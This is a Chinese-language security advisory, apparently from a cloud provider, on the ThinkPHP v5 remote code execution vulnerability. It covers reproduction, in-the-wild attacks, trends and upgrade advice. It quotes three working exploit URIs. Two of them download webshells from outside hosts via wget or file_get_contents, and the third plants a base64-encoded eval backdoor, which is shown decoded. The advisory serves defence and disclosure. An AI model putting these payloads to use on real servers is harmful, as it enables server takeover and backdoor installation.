漏洞復現：

我們拿存在ThinkPHP v5遠端程式碼執行漏洞的5.0.22版本進行復現測試。下圖是我們在存在該漏洞的主機上執行ls命令，可以拿到目錄下的所有檔案詳情。

漏洞攻擊真實案例

截至2018年12月11日，阿里雲態勢感知監控到的資料顯示，黑客們利用該漏洞進行攻擊的方式有很多，目前主要是以webshell為主，可能由於曝光PoC時間太短，很多黑產(如挖礦)都還沒充分利用。對目前所有的webshell方式總結後，比較流行的有以下幾種：

1. 利用該漏洞遠端執行下載命令，通過wget遠端下載一個webshell後門，執行命令從而獲得伺服器許可權。

其攻擊URI詳情如下：

"/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt "

通過執行wget命令：wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt，下載webshell。

下面是該webshell所具有的功能列表，如下圖：

2. 利用file_get_contents和file_put_contents函式，遠端下載webshell。

其攻擊的URI詳情如下：

"/?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents('content.php',file_get_contents('http://jzy1115.host3v.vip'));"

該webshell所具備的功能詳細如下圖：

3. 利用file_put_contents函式 寫入一句話webshell，其攻擊的URI詳情如下：

"/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents('./vendor/autoclass.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))"

該命令列包含的base64加密字串解碼如下：

"<?php [Math Processing Error]pass=_POST['360very'];eval($pass);?>"

該惡意程式碼將被寫入到檔案./vendor/autoclass.php中。

漏洞影響和攻擊趨勢

通過對網站資訊資料的統計，我們發現存在該漏洞的的網站佔比約10%左右。而從阿里雲態勢感知監控到的資料顯示，從2018-12-04開始至2018-12-11，被攻擊的網站資料暴增。以我們和漏洞利用攻擊對抗的經驗來看，該漏洞的利用攻擊會出現更多變種，各個企業應儘快升級ThinkPHP的程式碼框架至最新版本，避免自己的網站被攻破，伺服器淪陷為肉雞。

下面是被攻擊網站數量變化趨勢，可看出該漏洞被曝光後迅速被大規模自動化利用。

安全建議

阿里雲安全專家提醒：ThinkPHP的v5.0.23和v5.1.31為安全版本，建議大家儘快升級框架至最新版本來修復此漏洞。對於未及時升級的使用者請及時使用阿里雲態勢感知和WAF來抵禦攻擊，確保企業正常業務執行。

漏洞詳情：https://blog.thinkphp.cn/869075